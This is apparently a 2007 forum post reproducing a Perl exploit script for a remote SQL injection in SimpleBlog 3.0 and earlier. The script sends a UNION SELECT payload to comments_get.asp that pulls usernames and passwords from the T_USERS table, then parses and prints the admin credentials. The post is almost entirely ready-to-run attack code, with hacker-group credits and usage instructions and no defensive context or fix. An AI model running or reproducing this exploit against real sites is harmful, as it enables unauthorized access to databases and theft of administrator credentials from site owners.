Ras Posted August 16, 2007 Report Posted August 16, 2007 #!/usr/bin/perl#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++## SimpleBlog <= 3.0 [ comments_get.asp ] ## ] Remote SQL Injection [ ## ## [c]ode by TrinTiTTY [at] g00ns.net ## Vulnerability by MurderSkillz ## ## shoutz: murderskillz, z3r0, kat, str0ke, wicked, clorox ## ch0wn, a59, sess, bernard, + the rest of g00ns ## [irc.g00ns.net] [[url]www.g00ns.net][/url] [ts.g00ns.net] ##++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#use LWP::UserAgent;$host = @ARGV[0];$ua = LWP::UserAgent->new;my $inject = 'comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS';if (@ARGV < 1){&top( );&usage( )}elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}else { &xpl( ) }sub xpl( ) { &top( ); print "\n [~] Connecting\n"; $res = $ua->get("http://$host/$inject"); $con = $res->content; print "\n [~] Checking for admin info\n"; if ($con =~ /[b]([-_+.\w]{1,15})<\/strong>/gmi) { print "\n\t [+] Admin user: $1\n"; } if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi) { print "\n\t [+] Admin password: $2\n"; print "\n [+] Complete\n"; } else { print "\n [-] Unable to retrieve admin info\n"; exit(0); }}sub top( ){ print q { ################################################################## # SimpleBlog <= 3.0 [ comments_get.asp ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by MurderSkillz # ################################################################## }}sub usage( ){ print "\n Usage: perl simpleblog3.pl <host>\n"; print "\n Example: perl simpleblog3.pl www.example.com/path\n\n"; exit(0);} Quote